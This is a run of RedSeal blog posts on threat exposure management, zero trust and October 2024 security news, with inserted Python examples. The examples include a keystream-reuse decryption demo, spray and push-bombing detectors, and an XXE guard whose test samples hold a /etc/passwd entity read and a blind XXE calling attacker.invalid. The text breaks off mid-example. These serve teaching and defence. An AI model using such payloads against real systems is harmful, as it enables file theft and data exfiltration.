Prioritize to Protect: RedSeal’s Methodology for Effective Threat Exposure Management

In the fast-paced world of cybersecurity, the sheer volume of threat exposures can overwhelm even the most diligent security teams. Effective prioritization is not just a best practice; it’s essential for safeguarding your organization’s assets and ensuring a robust security posture.

The importance of prioritization

Prioritization in Continuous Threat Exposure Management (CTEM) goes beyond listing vulnerabilities and ranking them by CVSS score or severity level. RedSeal navigates that complexity with a comprehensive approach that prioritizes exposures by the risk they actually pose to the organization. By considering a multitude of internal, external, business, and technical factors, RedSeal focuses teams on high-impact, exploitable exposures on high-priority systems and assets, transforming how organizations manage their cybersecurity efforts.

How RedSeal enhances prioritization

At RedSeal, we understand that effective prioritization requires a nuanced approach. Our platform evaluates a wide array of factors to determine risk and prioritize exposures accurately. Where a traditional CTEM program prioritizes first and validates afterwards, RedSeal combines the two steps, automatically validating every exposure before prioritizing it. After all, if an exposure isn’t actually exploitable, it shouldn’t be a priority. RedSeal evaluates all possible access, north-south and east-west, across the entire network to assess whether exploitation is viable and to measure the true impact (blast radius) of each exposure. It then considers every consequence of direct and indirect (downstream) threats. The platform calculates risk scores by combining vulnerability and business data with detailed network context, so that exposures with greater business impact take higher priority.

RedSeal CTEM prioritization in action:

  1. Comprehensive risk assessment: RedSeal calculates risk scores by integrating data from security controls, asset criticality, and vulnerability assessments, along with network context. This approach ensures that no critical threat goes unnoticed.
  2. Network contextualization: Our ability to provide detailed network context sets the platform apart. By factoring visibility, exploitability, the likelihood of exploitation, and the likely impact of each exposure into the prioritization process, RedSeal offers a complete picture of the true threat.
  3. Network digital twin: The concept of a network digital twin is crucial in our prioritization process. It allows us to visualize both direct attack paths and the indirect, downstream consequences of potential threats. This holistic view helps organizations understand the broader implications of vulnerabilities and focus on exposures that could have the greatest impact.
  4. Business impact focus: At the heart of our prioritization strategy is a commitment to business impact. Exposures with the potential for greater repercussions on the organization are given higher priority, aligning cybersecurity efforts with overarching business objectives.
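To make the validate-then-prioritize idea concrete, here is a small Python sketch added to this post; it is not RedSeal code and does not reflect how the RedSeal platform is implemented. It builds a toy network model (hosts, zones, firewall allow rules, asset criticality and vulnerability findings, all constructed for the example), checks which findings an attacker can actually reach from a given starting zone, computes the blast radius of each reachable host, and ranks findings by reachability, blast radius and criticality rather than by CVSS alone. Note how the isolated host with a CVSS 10.0 finding drops to the bottom, and how the ranking changes when the attacker is assumed to already sit inside the corporate zone.

```python
"""Validate-then-prioritize over a toy network model (added example).

Everything here is constructed: hosts, zones, firewall rules, criticality
values and the finding IDs (F-1 .. F-4 are placeholders, not CVEs).
"""
from collections import deque

# Hosts: zone membership, listening ports, and business criticality (1-5).
HOSTS = {
    "web-1": {"zone": "dmz",  "services": {443},       "criticality": 2},
    "app-1": {"zone": "app",  "services": {8080},      "criticality": 3},
    "db-1":  {"zone": "data", "services": {5432},      "criticality": 5},
    "hr-1":  {"zone": "corp", "services": {3389, 445}, "criticality": 4},
    "lab-1": {"zone": "lab",  "services": {22},        "criticality": 1},
}

# Firewall policy as (src_zone, dst_zone, dst_port) allow rules; anything not
# listed is denied, traffic inside a zone is assumed unrestricted.
ALLOW = {
    ("internet", "dmz", 443),
    ("dmz", "app", 8080),
    ("app", "data", 5432),
    ("corp", "app", 8080),
    ("corp", "data", 5432),
    # "lab" has no rules in either direction: fully isolated.
}

# Vulnerability findings per host: (finding_id, cvss, vulnerable_port).
FINDINGS = {
    "web-1": [("F-1", 7.5, 443)],
    "db-1":  [("F-2", 9.8, 5432)],
    "lab-1": [("F-3", 10.0, 22)],
    "hr-1":  [("F-4", 8.8, 3389)],
}


def allowed(src_zone, dst_zone, port):
    return src_zone == dst_zone or (src_zone, dst_zone, port) in ALLOW


def exposed_hosts(attacker_zone="internet"):
    """Validation step: which hosts can an attacker starting in attacker_zone
    actually compromise?  Breadth-first over zones, pivoting only through
    hosts whose vulnerable port is reachable from a zone already controlled.
    Returns {host: (zone_attacked_from, finding_id)}."""
    controlled = {attacker_zone}
    compromised = {}
    frontier = deque([attacker_zone])
    while frontier:
        zone = frontier.popleft()
        for host, meta in HOSTS.items():
            if host in compromised:
                continue
            for fid, _cvss, port in FINDINGS.get(host, []):
                if allowed(zone, meta["zone"], port):
                    compromised[host] = (zone, fid)
                    if meta["zone"] not in controlled:
                        controlled.add(meta["zone"])
                        frontier.append(meta["zone"])
                    break
    return compromised


def blast_radius(host):
    """Downstream consequences: every host reachable on any allowed port once
    `host` is owned, pivoting through each host reached (lateral movement is
    assumed to need only connectivity here, not a further vulnerability)."""
    controlled = {HOSTS[host]["zone"]}
    reached = {host}
    frontier = deque(controlled)
    while frontier:
        zone = frontier.popleft()
        for other, meta in HOSTS.items():
            if other in reached:
                continue
            if any(allowed(zone, meta["zone"], p) for p in meta["services"]):
                reached.add(other)
                if meta["zone"] not in controlled:
                    controlled.add(meta["zone"])
                    frontier.append(meta["zone"])
    return reached


def prioritize(attacker_zone="internet"):
    """Rank findings: unreachable ones score 0 regardless of CVSS; reachable
    ones score cvss/10 times the summed criticality of their blast radius.
    Returns rows (score, host, finding_id, cvss, impact), highest first."""
    exposed = exposed_hosts(attacker_zone)
    rows = []
    for host, findings in FINDINGS.items():
        for fid, cvss, _port in findings:
            if host in exposed:
                impact = sum(HOSTS[h]["criticality"] for h in blast_radius(host))
                score = round(cvss / 10 * impact, 1)
            else:
                impact, score = 0, 0.0
            rows.append((score, host, fid, cvss, impact))
    return sorted(rows, key=lambda r: (-r[0], -r[3]))


if __name__ == "__main__":
    for zone in ("internet", "corp"):
        print(f"attacker in {zone}:")
        for score, host, fid, cvss, impact in prioritize(zone):
            print(f"  {score:5.1f}  {host:6} {fid}  cvss={cvss}  impact={impact}")
```

Run it as a script to print both rankings. The same reachability walk is what a zone-to-zone segmentation check needs: start from each source zone instead of from an attacker and flag any path that lands on a destination the policy forbids.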

In today’s complex security environment, effective prioritization of threat exposures is vital for successful Continuous Threat Exposure Management. RedSeal provides the tools necessary to assess risks comprehensively and focus on what truly matters. By considering a range of internal, external, business, and technical factors, we empower organizations to navigate their threat landscape with confidence and precision.

A partnership with RedSeal ensures that your CTEM efforts are strategically focused on high-impact exposures that protect your business and its future.

Read our blogs on scoping, the first step in CTEM, and on discovery, the second step.

Reach out to RedSeal today to schedule a demo and learn about RedSeal’s crucial role in supporting CTEM programs.

 

 

Cyber News Roundup for October 18, 2024

In an increasingly interconnected and technologically advanced world, the scope and complexity of cyber threats and security challenges have never been greater. From drones probing military bases to critical vulnerabilities in widely used software and hackers exploiting outdated physical access controls, organizations and governments face a wide range of risks that demand immediate attention and action. This week’s articles highlight the latest cybersecurity challenges, emphasizing the urgent need for proactive defenses against these emerging threats.

 

Mystery Drones Swarmed a U.S. Military Base for 17 Days. The Pentagon Is Stumped

In December, a fleet of advanced drones, suspected to be of Chinese origin, swarmed U.S. military installations near Norfolk, Virginia, including the home of Navy SEAL Team 6. These drones, capable of speeds over 100 mph and synchronized via AI, flew for 17 days, causing concern within the Biden administration. Due to legal restrictions preventing the military from shooting them down unless an imminent threat was posed, no decisive action was taken, even though the drones hovered over one of the most sensitive U.S. military bases.

A month later, a Chinese student was arrested after flying a drone near the base. The incident, along with similar drone sightings near nuclear facilities and other sensitive military sites, raised alarms about possible espionage or reconnaissance missions to test U.S. defenses. Critics argue that the administration’s inaction demonstrated weakness and missed an opportunity to send a strong message to China. This series of incidents is seen as part of a broader pattern of probing U.S. responses to potential threats. (WSJ, Fox News)

A critical vulnerability in Veeam Backup & Replication software is being exploited

A critical vulnerability in Veeam Backup & Replication software (CVE-2024-40711) is being exploited by hackers to deploy ransomware, including Fog and Akira variants. The flaw allows unauthenticated remote code execution, enabling attackers to create unauthorized accounts and gain privileged access. Attackers initially gained access through compromised VPN gateways without multifactor authentication. Sophos reported several attacks over the past month, highlighting the need for patching, updating outdated VPNs, and implementing strong security measures. Veeam has released a patch (version 12.2.0.334), and administrators are urged to apply it immediately. (Cyber Security News)

 

Iranian hackers exploit Windows flaw to elevate privileges

An Iranian state-sponsored hacking group, APT34, also known as OilRig, is targeting government and critical infrastructure entities in the United Arab Emirates and the Gulf region with an enhanced campaign. As reported by researchers at Trend Micro, the group is deploying a backdoor that uses Microsoft Exchange servers to steal credentials and exploits a known Windows flaw to elevate its privileges on compromised devices. The flaw is a high-severity privilege escalation vulnerability that Microsoft fixed in June. According to BleepingComputer, “Microsoft has acknowledged a proof-of-concept exploit for this CVE numbered flaw, but has not yet marked it as actively exploited, nor has CISA reported it in its Known Exploited Vulnerability catalog.” (BleepingComputer)

 

Microsoft deprecates PPTP and L2TP VPN protocols in Windows Server

These two tunneling protocols are being officially deprecated by Microsoft for future versions of Windows Server, along with a recommendation that admins move to protocols that offer increased security. The Point-to-Point Tunneling Protocol (PPTP) and Layer 2 Tunneling Protocol (L2TP) have been in use for more than 20 years to allow remote access to corporate networks and Windows servers. However, PPTP has become vulnerable to offline brute-force attacks against captured authentication hashes, and L2TP provides no encryption unless coupled with another protocol such as IPsec, and even then weaknesses can appear. Microsoft now recommends moving to the newer Secure Socket Tunneling Protocol (SSTP) and Internet Key Exchange version 2 (IKEv2), which provide better performance and security. (BleepingComputer)

 

Organizations Slow to Protect Doors Against Hackers

A recent study reveals that many organizations have been slow to secure vulnerable door access controllers, leaving them open to remote attacks. Researcher Shawn Merdinger, through his project “Box of Rain,” identified exposed systems in sectors such as healthcare, education, and law enforcement. Despite warnings and reports, many controllers remain vulnerable due to default credentials or unprotected web interfaces, potentially allowing hackers to gain unauthorized access. The findings highlight the ongoing risks posed by outdated physical access controls. (SecurityWeek)

Multiple Splunk Enterprise Vulnerabilities Let Attackers Execute Remote Code

Splunk has patched multiple high-severity vulnerabilities in its Enterprise and Cloud Platform products that allow remote code execution. These flaws, including CVE-2024-45733 (CVSS 8.8), affect Splunk Enterprise for Windows versions below 9.2.3 and 9.1.6. Another issue, CVE-2024-45731, allows writing files to the system root, while CVE-2024-45732 could enable unauthorized access to data. Splunk recommends upgrading to the latest versions and applying mitigations, such as disabling Splunk Web and ensuring proper installation configurations. These vulnerabilities highlight the critical need for timely security updates to protect sensitive systems. (Cyber Security News)

 

Must-patch flaw exposes tens of thousands

We are now getting a clearer idea of just how many IPs are vulnerable to the Fortinet vulnerability that CISA placed on its critical patch list last week. According to CyberScoop, around 87,000 IPs are likely susceptible to the vulnerability, which has a 9.8 rating on the CVSS scale. Fortinet released a fix in February, but the issue remains widespread, with the majority of vulnerable IPs located in Asia, North America, and Europe. Federal agencies are required to address the issue by the end of October. (CyberScoop)

 

Firefox zero-day update to include Tor

Shortly after Firefox rolled out version 131.0.2 with a fix for a critical zero-day vulnerability (CVE-2024-9680), the Tor browser was also updated to patch the issue. The bug, which could lead to remote code execution via a use-after-free flaw in the Animation timeline, had been actively exploited in the wild, as confirmed by Mozilla and reported by ESET. Both Firefox and Tor quickly responded to the exploit, delivering fixes within 25 hours of identifying the issue. (Security Week)

 

Nearly 400 U.S. healthcare institutions hit with ransomware over past 12 months

On Tuesday, Microsoft released a report revealing that between July 2023 and June 2024, 389 U.S.-based healthcare institutions were successfully hit with ransomware. The attacks caused network and system outages, delays in critical medical operations and rescheduled appointments. Microsoft customers reported a 2.75x increase in human-operated ransomware encounters. The researchers said that the motives of Russian, North Korean and Iranian cybercriminals appear to have shifted from destruction to financial gain. The report did yield some positive news, showing that the percentage of ransomware attacks that reached the encryption stage has decreased significantly over the past two years. (The Record and The Register)

 

Encryption flaws found in WeChat

Researchers at Citizen Lab investigated the MMTLS encryption protocol used by the massively popular WeChat app. They found that MMTLS is a modified version of TLS 1.3 whose modifications introduce cryptographic weaknesses. While the researchers could not craft an attack that exploits these weaknesses, they noted that MMTLS uses deterministic initialization vectors, which opens the door to a brute-force attack and goes against NIST recommendations. The protocol also lacks forward secrecy because of its heavy use of session-resuming pre-shared keys. The researchers published their full findings and methodology on GitHub. (Citizen Lab)
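The deterministic-IV point deserves a concrete illustration, so the following Python example is added here; it is not Citizen Lab’s code and is not MMTLS. It uses a toy counter-mode stream cipher whose keystream is SHA-256 over key, IV and counter (chosen so the example needs only the standard library), because the hazard is the same for any stream mode, AES-GCM and AES-CTR included: NIST SP 800-38D requires that a key and IV pair never be reused, and when it is, XORing two ciphertexts cancels the keystream and leaves the XOR of the two plaintexts. The messages and keys are constructed for the example.

```python
"""Keystream reuse from a deterministic IV (added example, stdlib only).

This is a toy CTR-style stream cipher whose keystream is SHA-256 over
key || iv || counter. It is NOT MMTLS, TLS or AES-GCM; it is here only
because the property it shows is identical for any stream mode: the same
key and IV produce the same keystream, so XORing two ciphertexts cancels
the keystream and leaves p1 XOR p2 for an attacker to work with.
"""
import hashlib
import os
from itertools import count


def keystream(key: bytes, iv: bytes, length: int) -> bytes:
    """Deterministic keystream: SHA-256(key || iv || 32-bit counter), blocks
    concatenated until `length` bytes are available."""
    out = bytearray()
    for ctr in count():
        out += hashlib.sha256(key + iv + ctr.to_bytes(4, "big")).digest()
        if len(out) >= length:
            return bytes(out[:length])


def xor(a: bytes, b: bytes) -> bytes:
    """Byte-wise XOR over the common prefix of a and b."""
    return bytes(x ^ y for x, y in zip(a, b))


def encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Stream-mode encryption; decryption is the same call (XOR is involutive)."""
    return xor(plaintext, keystream(key, iv, len(plaintext)))


def two_time_pad(c1: bytes, c2: bytes, known_p1: bytes) -> bytes:
    """If c1 and c2 share key and IV: c1 ^ c2 == p1 ^ p2, so a known (or
    guessed) p1 yields p2 directly. Works on the overlapping prefix."""
    return xor(xor(c1, c2), known_p1)


# Constructed sample messages of equal length: a predictable record and a
# secret one sent in the same session.
P1 = b"GET /status HTTP/1.1   "
P2 = b"token=s3cr3t-session-id"
KEY = os.urandom(32)      # fresh per-session key, as a handshake would provide
FIXED_IV = bytes(12)      # deterministic IV: identical for every record (the flaw)


def attack_with_fixed_iv(key=KEY, iv=FIXED_IV) -> bytes:
    """Same key, same IV for both records: the attacker who knows P1
    recovers P2 byte for byte."""
    c1 = encrypt(key, iv, P1)
    c2 = encrypt(key, iv, P2)
    return two_time_pad(c1, c2, P1)


def attack_with_random_ivs(key=KEY) -> bytes:
    """Unique IV per record: the keystreams differ and the same attack
    yields noise instead of P2."""
    c1 = encrypt(key, os.urandom(12), P1)
    c2 = encrypt(key, os.urandom(12), P2)
    return two_time_pad(c1, c2, P1)


if __name__ == "__main__":
    print("fixed IV  ->", attack_with_fixed_iv())
    print("random IV ->", attack_with_random_ivs())
```

The attack needs no key material at all, only two ciphertexts and a guess at one plaintext, which is why every nonce-based mode makes IV uniqueness a hard requirement rather than a recommendation.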

 

CISA refines SBOM guidance

The US Cybersecurity and Infrastructure Security Agency published a new edition of its Framing Software Component Transparency document, providing new guidance on creating software bills of materials (SBOMs). The new edition sorts SBOM attributes into minimum expected, recommended, and aspirational categories. The baseline requirements primarily focus on transparency and interoperability with existing SBOM formats. CISA also pointed out that to make SBOMs useful, the industry needs coordinated and automated methods to share SBOM data. (Infosecurity Magazine)

 

Hackers steal data from Verizon’s push-to-talk (PTT) system

Hackers have stolen data from Verizon’s push-to-talk (PTT) system, which is marketed to government agencies and first responders, and are now selling the data on a Russian cybercrime forum. 404 Media reports the breach did not affect Verizon’s main consumer network, but it targeted a third-party provider supporting the PTT system. The stolen data includes call logs, emails, and phone numbers. Verizon confirmed that a small subset of customer data was exposed but noted that no sensitive information such as Social Security numbers was leaked. The hackers, including Cyberphantom and Judische, are part of a cybercriminal group known as the “Com,” responsible for numerous high-profile breaches. The hackers are selling the stolen data instead of extorting Verizon. (CyberInsider)

 

CISA and its partners warn of Iranian brute force password attempts

A joint cybersecurity advisory from the U.S. Cybersecurity and Infrastructure Security Agency (CISA), FBI, NSA, and other international authorities warns that Iranian cyber actors are increasingly using brute force methods like password spraying and “push bombing” to target global critical infrastructure sectors. These attackers focus on healthcare, government, IT, and energy sectors to steal credentials and gain deeper access to systems. The advisory highlights that Iranian actors have exploited MFA vulnerabilities and sold stolen credentials, urging organizations to enhance security by implementing phishing-resistant MFA and monitoring for suspicious logins and behaviors. (Gov Info Security)
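As an added example of what monitoring for these two techniques can look like, the Python below parses a handful of constructed authentication log lines (the key=value format and the thresholds are assumptions, not any vendor’s format) and flags a password spray, one source failing against many accounts with only one or two attempts each, and an MFA push-bombing sequence, repeated prompts to one user with denials and timeouts followed by an approval. This is not code from CISA’s advisory or from RedSeal.

```python
"""Detections for password spraying and MFA push bombing (added example).

The log lines below are constructed for the example; the key=value format
is a stand-in for whatever your IdP emits and the thresholds are illustrative.
"""
from collections import defaultdict
from datetime import datetime, timedelta

SAMPLE_LOG = """\
2024-10-15T08:00:01Z event=login src=203.0.113.5 user=alice result=fail
2024-10-15T08:00:03Z event=login src=203.0.113.5 user=bob result=fail
2024-10-15T08:00:05Z event=login src=203.0.113.5 user=carol result=fail
2024-10-15T08:00:07Z event=login src=203.0.113.5 user=dave result=fail
2024-10-15T08:00:09Z event=login src=203.0.113.5 user=erin result=fail
2024-10-15T08:00:11Z event=login src=203.0.113.5 user=frank result=success
2024-10-15T08:00:12Z event=mfa_push src=203.0.113.5 user=frank result=denied
2024-10-15T08:00:40Z event=mfa_push src=203.0.113.5 user=frank result=timeout
2024-10-15T08:01:05Z event=mfa_push src=203.0.113.5 user=frank result=denied
2024-10-15T08:01:30Z event=mfa_push src=203.0.113.5 user=frank result=approved
2024-10-15T08:02:00Z event=login src=198.51.100.7 user=grace result=fail
2024-10-15T08:02:30Z event=login src=198.51.100.7 user=grace result=fail
2024-10-15T08:03:00Z event=login src=198.51.100.7 user=grace result=success
2024-10-15T08:03:01Z event=mfa_push src=198.51.100.7 user=grace result=approved
"""


def parse(log_text):
    """Turn key=value lines into dicts with a parsed 'ts', sorted by time."""
    events = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, _, rest = line.partition(" ")
        fields = dict(kv.split("=", 1) for kv in rest.split())
        fields["ts"] = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
        events.append(fields)
    return sorted(events, key=lambda e: e["ts"])


def _windows(evs, window):
    """Yield each trailing slice of evs whose span fits inside `window`."""
    lo = 0
    for hi in range(len(evs)):
        while evs[hi]["ts"] - evs[lo]["ts"] > window:
            lo += 1
        yield evs[lo:hi + 1]


def detect_password_spray(events, window=timedelta(minutes=10),
                          min_users=5, max_per_user=2):
    """One source, many accounts, few attempts each: the inverse of classic
    brute force, and invisible to per-account lockout counters."""
    fails = defaultdict(list)
    for e in events:
        if e["event"] == "login" and e["result"] == "fail":
            fails[e["src"]].append(e)
    alerts = []
    for src, evs in fails.items():
        for win in _windows(evs, window):
            per_user = defaultdict(int)
            for e in win:
                per_user[e["user"]] += 1
            if len(per_user) >= min_users and max(per_user.values()) <= max_per_user:
                alerts.append({"rule": "password_spray", "src": src,
                               "users": sorted(per_user),
                               "first": win[0]["ts"], "last": win[-1]["ts"]})
                break
    return alerts


def detect_push_bombing(events, window=timedelta(minutes=5), min_prompts=3):
    """Repeated MFA pushes to one user with denials or timeouts; an approval
    after that pattern is the MFA-fatigue success case and is rated high."""
    pushes = defaultdict(list)
    for e in events:
        if e["event"] == "mfa_push":
            pushes[e["user"]].append(e)
    alerts = []
    for user, evs in pushes.items():
        best = None
        for win in _windows(evs, window):
            rejected = sum(e["result"] in ("denied", "timeout") for e in win)
            if len(win) >= min_prompts and rejected:
                severity = "high" if win[-1]["result"] == "approved" else "medium"
                if best is None or severity == "high":
                    best = {"rule": "push_bombing", "user": user,
                            "src": win[-1]["src"], "prompts": len(win),
                            "rejected": rejected, "severity": severity}
        if best:
            alerts.append(best)
    return alerts


if __name__ == "__main__":
    evs = parse(SAMPLE_LOG)
    for alert in detect_password_spray(evs) + detect_push_bombing(evs):
        print(alert)
```

In the sample both alerts share a source address and the spray ends with the one account whose password worked, which is the join worth making in a SIEM: a spray followed by push prompts from the same source is the whole intrusion chain the advisory describes, not two unrelated events.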

 

F5 publishes quarterly security notification, addressing BIG-IP and BIG-IQ vulnerabilities

News about the fixes for these vulnerabilities came in the October edition of the company’s quarterly security notification. The update for BIG-IP, a collection of hardware platforms and software solutions, addresses a high-severity security defect affecting the appliance’s monitor functionality. The update for BIG-IQ, which centralizes management, licensing, monitoring, and analytics for a dispersed BIG-IP infrastructure, addresses what is described as “a stored cross-site scripting (XSS) bug in an undisclosed page of the appliance’s user interface.” F5 makes no mention of either vulnerability being exploited in the wild. Further details are available in the F5 quarterly security notification. (F5 Quarterly Security Notification)

 

Vulnerability warnings from Kubernetes and VMware, plus new KEV catalog entries

Finally, a quick summary of some other vulnerabilities of note this week. A Kubernetes Image Builder vulnerability could allow attackers to gain root access if exploited under specific conditions; it applies only to Kubernetes clusters whose nodes use VM images built by the Image Builder project with its Proxmox provider. VMware has fixed “a high-severity SQL injection flaw in HCX allowing non-admin users to remotely execute code on the HCX manager.” CISA has added three vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: a Microsoft Windows Kernel TOCTOU race condition vulnerability, a Mozilla Firefox use-after-free vulnerability, and a SolarWinds Web Help Desk hardcoded credential vulnerability. (Security Affairs, Security Affairs and Security Affairs)

 

Have questions? Reach out to RedSeal today to chat with one of our cybersecurity experts or to schedule a demo.

Navigating Cybersecurity Risks: RedSeal’s Discovery Solutions for CTEM

In today’s cybersecurity landscape, simply knowing your assets isn’t enough; you must be able to uncover hidden vulnerabilities that put your organization at risk. As cyber threats become increasingly sophisticated, the discovery phase of Continuous Threat Exposure Management (CTEM) takes center stage. This critical process involves not just identifying what assets you have, but also continuously monitoring their connections and assessing them for both known vulnerabilities and emerging threats. It’s the distinction between simply getting by and actively safeguarding your digital environment. 

The importance of discovery in CTEM

Gartner recommends running discovery against the scopes outlined in the previous stage. Running discovery against clearly defined scopes raises awareness of risk among the relevant business teams, which both aids in identifying potential threats and ensures that successes in exposure management are meaningful and impactful in later stages.

 How RedSeal supports discovery 

At RedSeal, we recognize that automation is vital for keeping track of asset exposures. Our platform goes beyond traditional external exposure hunting tools that only provide a snapshot of vulnerabilities. Instead, RedSeal builds a reliable, comprehensive digital twin of your entire environment, automating the analysis of complex layers of network infrastructure. This approach allows organizations to continuously identify exposures caused by various factors, including: 

  • Unmanaged assets: Detecting assets that may not be adequately monitored or secured. 
  • Misconfigurations: Identifying incorrect settings that could leave systems vulnerable. 
  • Unintended connections: Uncovering both direct and indirect links that could pose risks. 
  • Firewall rules and policy violations: Ensuring that security policies are properly enforced. 
  • Vulnerabilities: Continuously scanning for known vulnerabilities and emerging threats. 

Because it works from a continuously maintained model rather than from point-in-time scans, RedSeal keeps identifying assets and exposures of all of these kinds, including those caused by hidden assets, and covers both known and emerging vulnerabilities. It also runs automated attack path analysis and compliance checks against external regulations and standards, internal policies, and best practices, so that exposure assessments stay current and organizations can stay ahead of potential threats.

Effective discovery is a cornerstone of an effective CTEM program. By leveraging RedSeal’s robust capabilities, organizations can confidently navigate the complexities of their networks, ensuring that they are prepared to mitigate risks and protect their valuable assets. With a reliable digital twin and automated assessments, RedSeal is pivotal in enhancing an organization’s security posture, making exposure management a proactive and ongoing endeavor. 

 Read our blog on scoping, the first step in CTEM management. 

 Reach out to RedSeal today to schedule a demo and learn about RedSeal’s crucial role in supporting CTEM programs. 

Make Network Security a Zero Trust Priority

The National Security Agency’s (NSA) Cybersecurity Information Sheet (CSI) titled “Advancing Zero Trust Maturity Throughout the Network and Environment Pillar” and the CISA Zero Trust Maturity Model version 2 underscore the importance of securing network environments in line with zero trust principles. Both documents emphasize an integrated approach to zero trust, placing network security alongside identity management, data protection, and continuous monitoring.

John Kindervag, the creator of zero trust, recently cautioned the cybersecurity industry about its overemphasis on identity management, reminding us of the critical role that network security plays in the zero trust framework. As organizations continue to mature their zero trust architectures, the NSA and CISA outline clear guidelines on how network security fits into the overall security strategy.

Key insights from the CISA and NSA zero trust guidance

1. Data flow mapping

The CISA Zero Trust Maturity Model v2 emphasizes the importance of understanding data flows across the network to enforce zero trust effectively. RedSeal’s network mapping capabilities align perfectly with this requirement. By visualizing network paths, RedSeal helps organizations identify unprotected data flows, ensuring that sensitive information does not traverse insecure network paths. This visibility is crucial for implementing micro- and macro-segmentation strategies.

2. Macro-segmentation and micro-segmentation

Both the NSA and CISA documents stress the need for segmentation as a core component of zero trust. Macro-segmentation involves dividing networks into broad security zones to limit lateral movement by attackers. RedSeal’s “Zones and Policies” feature supports this by enforcing policies that prevent unauthorized access between different zones, such as between departments or IT and operational technology environments.

Micro-segmentation, on the other hand, focuses on further reducing the attack surface within network segments. RedSeal’s policy management capabilities assist organizations in enforcing precise controls at a granular level. With RedSeal’s advanced network modeling, you can identify the most critical areas for micro-segmentation and ensure policies are applied effectively.

3. Software-defined networking (SDN)

RedSeal’s capabilities complement SDN implementations, which are highlighted by CISA and NSA as essential for creating dynamic, adaptable zero trust environments. SDN allows for more granular and flexible control over network traffic. RedSeal enhances these SDN strategies by providing deep insights into network structure and identifying potential vulnerabilities, which is crucial for crafting effective SDN policies.

4. Threat visibility and continuous monitoring

Continuous monitoring is a cornerstone of zero trust, as outlined by both the NSA and CISA. RedSeal’s continuous network visibility and monitoring allow organizations to stay vigilant and identify potential risks. The ability to verify network configurations continuously ensures that security policies remain effective and adaptive as threats evolve.

Advancing zero trust maturity with RedSeal

RedSeal is uniquely positioned to help organizations mature their zero trust architectures, particularly within the network and environment pillar. By delivering comprehensive network visibility, enabling effective segmentation, and supporting SDN strategies, RedSeal plays a critical role in limiting attack surfaces and strengthening an organization’s security posture.

Zero trust is not a one-size-fits-all approach, but by leveraging RedSeal’s capabilities, you can ensure your network security is robust, dynamic, and capable of meeting the stringent requirements outlined by both CISA and NSA.

Discover how RedSeal can enhance your zero trust journey by scheduling a demo or attending one of our free monthly Cyber Threat Hunt workshops.

 

Cyber News Roundup for October 4, 2024

Recent headlines highlight significant challenges in cybersecurity across the globe. Cloudflare blocked a massive 3.8 Tbps DDoS attack targeting finance and telecom sectors, while Adobe Commerce faces exploitation of critical vulnerabilities. Agence France-Presse experienced disruptions from cyberattacks, and UMC Health in Texas diverted patients due to a ransomware incident. Major providers like Verizon and PlayStation also faced outages. With state Chief Information Security Officers expressing budget concerns, the urgency for robust cybersecurity measures has never been clearer, emphasizing the need for ongoing vigilance in the face of evolving threats.

 

Cloudflare blocks largest recorded DDoS attack peaking at 3.8Tbps

This denial-of-service campaign targeted organizations in the financial services, internet, and telecommunications sectors as part of a “month-long barrage of more than 100 hyper-volumetric DDoS attacks flooding the network infrastructure with garbage data.” According to Cloudflare, which successfully blocked the attack, the infected devices used were mostly located in Russia, Vietnam, the U.S., Brazil, and Spain. They consisted of a large number of Asus home routers, MikroTik systems, DVRs, and web servers. The peak at 3.8 Tbps lasted 65 seconds. (BleepingComputer)

 

Adobe Commerce and Magento stores compromised by CosmicSting bug

Researchers at Sansec report that numerous threat actors have exploited this vulnerability in Adobe Commerce, which carries a CVSS score of 9.8, compromising more than 4,000 e-stores over the past three months. The flaw is an XML external entity (XXE) issue: “An attacker could exploit this issue by sending a crafted XML document that references external entities, and exploitation of this issue does not require user interaction.” The vulnerability was added to the CISA KEV catalog in July of this year. (Security Affairs)
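For readers who want to see what “references external entities” means in practice, the following Python example is added here; it is not Sansec’s or Adobe’s code and has nothing to do with Adobe Commerce internals. It shows the defensive side: a wrapper around the standard-library expat parser that refuses any DOCTYPE or entity declaration in untrusted XML, exercised against a benign document, a file-read XXE payload and a blind XXE that only points at an external DTD, all constructed for the example. The vulnerable counterpart is any parser that resolves external entities by default; lxml’s XMLParser does so unless resolve_entities=False is passed.

```python
"""Refusing DTD/entity declarations in untrusted XML (added example).

Parsers that resolve external entities by default are the pattern behind
XXE; this stdlib expat wrapper rejects the whole DOCTYPE instead, which
also closes internal-entity expansion (billion laughs). Sample documents
are constructed for the example.
"""
import xml.parsers.expat as expat


class UnsafeXML(ValueError):
    """Raised when a document carries a DOCTYPE or entity declaration."""


def parse_untrusted_xml(data: bytes) -> dict:
    """Parse XML from an untrusted party into {element_path: text}.

    Any <!DOCTYPE ...> is refused outright: external entities are the XXE
    vector, internal ones still allow entity-expansion DoS, and neither has
    a legitimate use in data arriving from outside."""
    parser = expat.ParserCreate()

    def reject_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXML(f"DOCTYPE not allowed (name={name!r}, system id={sysid!r})")

    def reject_entity(name, is_param, value, base, sysid, pubid, notation):
        raise UnsafeXML(f"entity declaration not allowed: {name!r}")

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.EntityDeclHandler = reject_entity
    # Belt and braces: never fetch or parse parameter entities from a DTD.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    stack, texts = [], {}

    def start(tag, attrs):
        stack.append(tag)

    def end(tag):
        stack.pop()

    def chars(text):
        # expat may deliver one text node in several chunks; accumulate.
        key = "/".join(stack)
        texts[key] = texts.get(key, "") + text

    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.CharacterDataHandler = chars
    parser.Parse(data, True)
    return {k: v for k, v in texts.items() if v.strip()}


def rejects(data: bytes) -> bool:
    """True if the guard refuses the document, False if it parses."""
    try:
        parse_untrusted_xml(data)
    except UnsafeXML:
        return True
    return False


# Constructed samples: a benign order, a classic file-read XXE, and a blind
# XXE that only references an external DTD (no internal subset at all).
BENIGN = b'<?xml version="1.0"?><order><id>42</id><note>thanks</note></order>'
XXE_FILE = (b'<?xml version="1.0"?>'
            b'<!DOCTYPE order [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
            b'<order><id>&xxe;</id></order>')
XXE_BLIND = (b'<?xml version="1.0"?>'
             b'<!DOCTYPE order SYSTEM "http://attacker.invalid/evil.dtd">'
             b'<order><id>1</id></order>')

if __name__ == "__main__":
    print(parse_untrusted_xml(BENIGN))
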